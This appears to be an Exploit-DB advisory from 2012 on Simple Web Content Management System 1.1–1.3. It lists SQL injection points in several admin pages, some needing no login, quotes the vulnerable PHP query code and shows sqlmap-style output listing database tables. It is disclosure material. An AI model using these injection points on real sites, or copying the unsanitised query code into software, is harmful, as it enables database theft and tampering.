Simple Web Content Management System 1.1 < 1.3 - Multiple SQL Injections

EDB-ID:

18955




Platform:

PHP

Date:

2012-05-30


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

######################################################################################
# Exploit Title: Simple Web Content Management System SQL Injection
# Date: May 30th 2012
# Author: loneferret
# Version: 1.1 & 1.3
# Application Url: http://www.cms-center.com/
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23
######################################################################################
# Discovered by: loneferret
######################################################################################

# Side note:
# This application is nothing fancy, and really shouldn't be used other than
# for practicing SQLi. Pretty much every page has at least one (1) vulnerable 
# parameter.

# Vulnerability:
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most of them require to be authenticated with an account (admin).
# But there are a few pages that will cause an error without having to logon.


# PoC 1:
# No Authentication Required.
# Page: /admin/item_delete.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
15      $id = $_GET['id'];
16      $title = NULL;
17      $text = NULL;
18      database_connect();
19      $query = "select title,text from content where id = $id;";
20      //echo $query;
21      $result = mysql_query($query);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.



# PoC 2:
# No Authentication Required.
# Page: /admin/item_status.php?id=[SQLi]&status=1
# Page: /admin/item_status.php?id=1&status=[SQLi]
# Vulnerable Parameter: id & status
# Code:
10	$ref = $_GET['ref'];
11	$id = $_GET['id'];
12	$status = $_GET['status'];
13	$update = "UPDATE content
14			SET status='$status'
15			WHERE id='$id'"; 
16	$query = mysql_query($update)
		or die("Their was a problem updating the status: ". mysql_error()); 

# As stated, nothing is checked before passing "id" and/or "status" to MySql.
# This results in a MySql error.



# PoC 3:
# Authentication Required.
# Page: /admin/item_detail.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
15     $id = $_GET['id'];
16     $title = NULL;
17     $text = NULL;
18     database_connect();
19     $query = "select title,text from content where id = $id;";
20     //echo $query;
21     $result = mysql_query($query);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.


# PoC 4:
# Authentication Required.
# Page: /admin/item_modify.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
60	database_connect();		
61	if(isset($_GET['id'])) {
62		$id = ($_GET['id']);
63	}
64	$select = "SELECT *
65			FROM content
66			where id = '$id'";
67	$query = mysql_query($select);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.

# PoC 6:
# Authencitation Required.
# Page: /admin/item_position.php?id=[SQLi]&mode=up
# Vulnerable Parameter: id
.
...ok I think we get the idea now.
.
.
#		
# Example output:
#
[19:40:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[19:40:22] [INFO] fetching tables for database: phpcms
[19:40:22] [INFO] heuristics detected web page charset 'ascii'
[19:40:22] [INFO] the SQL query used returns 1 entries
[19:40:22] [INFO] retrieved: content
Database: phpcms
[1 table]
+---------+
| content |
+---------+